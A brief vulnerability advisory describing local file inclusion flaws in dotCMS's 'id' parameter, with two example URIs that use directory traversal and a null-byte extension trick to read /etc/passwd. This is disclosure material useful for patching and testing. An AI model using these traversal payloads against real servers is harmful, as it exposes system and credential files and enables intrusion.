dotCMS 'id' Parameter Multiple Local File Include Vulnerabilities

dotCMS 'id' Parameter Multiple Local File Include Vulnerabilities

Attackers can exploit these issues via a browser.

The following example URIs are available:

http://www.example.com/news/index.dot?id=../../../../../../../../etc/passwd%00.jpg
http://www.example.com/getting_started/macros/macros_detail.dot?id=../../../../../../../../etc/passwd%00.html